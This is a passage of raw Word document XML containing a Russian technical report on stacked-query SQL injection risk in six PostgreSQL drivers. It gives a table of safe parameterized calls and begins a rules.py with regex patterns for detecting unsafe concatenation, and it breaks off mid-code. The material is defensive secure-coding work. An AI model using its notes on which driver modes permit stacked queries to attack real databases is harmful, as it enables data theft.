        <w:t>, оба results доступны при стакинге. Безопасный путь сильнее, чем у psycopg2 — значения не смешиваются с SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6281FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.3 asyncpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без client-side mogrify вообще. Либо args через wire ($1) → extended, либо raw simple-protocol. Виден только последний result при стакинге.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121D174" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.4 pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — два API-класса: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (всегда simple, уязвим к стакингу) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (extended по умолчанию). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в URL снимает серверную защиту, оставляя только client-side для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>-параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D235D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.5 pgx (Go)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный из шести, у которого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default extended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> применяется к любому SQL, не только при наличии args. Конкатенация без args здесь блокируется сервером, чего нет у остальных пяти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2608F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5.6 node-postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — без values голый simple без экранирования; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>оба results возвращаются в одном response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при стакинге. Template literals — синтаксический трап.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F0327" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Cookbook: правило для разработчика по стеку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181AAD2E"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0D8A14C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Стек</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1B0A7F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Безопасный вызов</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1279F64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Что обеспечивает защиту</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="261CC5C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726CD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python + psycopg2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C6579D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cur.execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-placeholder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1BDDE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">client-side </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>adapt()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-экранирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3B4CB94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DC3BA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python + psycopg3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E8959B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cur.execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-placeholder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C060C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parse + Bind через extended protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2746041B"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6CF1F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python + asyncpg</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8AB53E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>conn.fetch(sql, *args)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-placeholder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57EDAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parse + Bind через extended protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3404EAFF"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1835D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Java + pgjdbc</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D604CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PreparedStatement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>setXxx()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82C67A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parse + Bind; default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>preferQueryMode=extended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5B2FA64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B806B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Go + pgx v5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E663CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>conn.Query(ctx, sql, args...)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-placeholder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8F6C04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parse + Bind; default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>QueryExecModeCacheStatement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3D44A3A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0BB170" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Node.js + pg</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A2EAE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>client.query(sql, [values])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-placeholder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19A7BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parse + Bind через extended protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D46F4AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Общее правило: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значение пользовательского ввода должно прийти на сервер как отдельный Bind-параметр</w:t>
      </w:r>
      <w:r>
        <w:t>, а не как часть SQL-текста. Конкатенация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, f-string, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fmt.Sprintf</w:t>
      </w:r>
      <w:r>
        <w:t>, template literal) — анти-паттерн для всех стеков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76250408" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса MULTI_STATEMENT_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518A4CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный набор паттернов по 6 драйверам:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7692DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># app/schemas/sql.py — добавить в VulnerabilityClass enum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC9B3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580CA8DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6EC1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    MULTI_STATEMENT_INJECTION = "multi_statement_injection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D1FD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AD544"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53A475F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.MULTI_STATEMENT_INJECTION: 9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E1357" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948DA8E"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3AF54D48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"stacked_python": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA298DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\b(?:cursor|cur|conn)\.(?:execute|fetch|fetchrow|fetchval)\s*\(\s*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF9B6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:f[\"']|[\"'][^\"']*[\"']\s*(?:\+|%\s*\w+|\.format))",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768A542D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC294D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"stacked_java": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5938A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:createStatement\(\)\.execute|Statement\s+\w+\s*=.*createStatement)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE412C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"|preferQueryMode\s*=\s*simple",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876EFCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA7BDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CEB8CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"stacked_go": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A94A9C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\.(?:Query|QueryRow|Exec)\(\s*\w+\s*,\s*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24420333" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:\"[^\"]*\"\s*\+|fmt\.Sprintf\()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13816F15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"|QueryExecModeSimpleProtocol",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F2AE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
